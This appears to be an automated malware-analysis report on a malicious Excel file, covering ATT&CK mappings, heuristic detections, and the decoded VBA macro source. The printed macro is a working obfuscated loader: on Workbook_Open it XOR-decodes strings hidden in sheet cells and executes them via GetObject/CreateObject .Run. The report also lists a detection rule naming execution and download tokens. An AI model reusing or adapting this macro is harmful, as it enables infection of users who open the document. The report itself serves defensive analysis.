Verdict: MALICIOUS
Risk Score: 148
Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1059 Command and Scripting Interpreter
- T1203 Exploitation for Client Execution
The sample is an XLS file containing VBA macros, specifically a Workbook_Open macro that utilizes CreateObject and GetObject calls. The macro attempts to deobfuscate and execute a payload, indicated by the 'Minneapolis' function and the use of hardcoded strings like 'q9b7d8291c'. The deobfuscated content is likely a second-stage downloader.
Heuristics (5)

- VBA macros detected (severity: medium; rule: OLE_VBA_MACROS; 4 related findings): Document contains VBA macro code.
- CreateObject call (severity: high; rule: OLE_VBA_CREATEOBJ). Matched line in script: `GetObject(Florist).CreateObject(Earrings).Run HouseHolds & " " & Basics & Optimal, 0`
- GetObject call (severity: high; rule: OLE_VBA_GETOBJ). Matched line in script: `GetObject(Florist).CreateObject(Earrings).Run HouseHolds & " " & Basics & Optimal, 0`
- VBA p-code auto-exec with execution tokens (severity: high; rule: OLE_VBA_PCODE_AUTOEXEC_EXEC): Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
- Workbook_Open macro (severity: low; rule: OLE_VBA_WBOPEN). Matched line in script: `Sub Workbook_Open()`
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4367 bytes | a17329cfef485d802be51344045c34a6e9cbfc45a9624e99f4e805b2761fdf2f |
Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Private Function Minneapolis(ByVal Pleased As String) As Variant
Dim Transferred As Long: Transferred = 0: Dim Rocks() As Byte
Dim Crimes() As Byte, RestoRation As String, Islam As Integer, Robot As Integer, Chapters As Integer
Crimes = "q9b7d8291c"
GoTo RecoRdings
Constantly:
If Transferred < UBound(Rocks) Then
Islam = Transferred Mod (10)
Chapters = Crimes(Islam * 2)
Robot = Rocks(Transferred)
GoTo Amber
Metropolitan:
RestoRation = RestoRation & Chr(Rocks(Transferred))
Transferred = Transferred + 1
GoTo Constantly
Else
GoTo Grounds
End If
Grounds:
Minneapolis = RestoRation
Exit Function
RecoRdings:
Rocks = Quoted(Pleased)
GoTo Constantly
Amber:
Rocks(Transferred) = Abs(Robot Xor Chapters)
GoTo Metropolitan
End Function
Private Sub Democrats(ByVal Florist As String, ByVal Optimal As String, ByVal HouseHolds As String, ByVal Earrings As String, ByVal Basics As String)
GetObject(Florist).CreateObject(Earrings).Run HouseHolds & " " & Basics & Optimal, 0
End Sub
Sub Workbook_Open()
Democrats Minneapolis(Sheets("f2ca").Range("H182").Value), Minneapolis(Sheets("f2ca").Range("F133").Value), Minneapolis(Sheets("f2ca").Range("J189").Value), Minneapolis(Sheets("f2ca").Range("J112").Value), Minneapolis(Sheets("f2ca").Range("J116").Value)
End Sub
Private Function Quoted(ByVal Nurses As String) As Variant
Dim RestoRation() As Byte, i As Long, Islam As Integer, Jurisdiction As Integer
Jurisdiction = Len(Nurses) / 2: i = 0: ReDim RestoRation(0 To Jurisdiction) As Byte
Chapters:
If i < Len(Nurses) Then
Islam = Islam + 1
RestoRation(Islam - 1) = Chr((7 * 2) + (((10 - 4) * 2) * 2)) & Chr((((16 / 2) * 2) + (4 * 5)) * 2) & Mid(Nurses, i + 1, 2)
i = i + 2
GoTo Chapters
Else
GoTo MatheMatical
Dim Amber As String
Amber = InputBox("celp lape")
End If
MatheMatical:
Quoted = RestoRation
End Function
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
```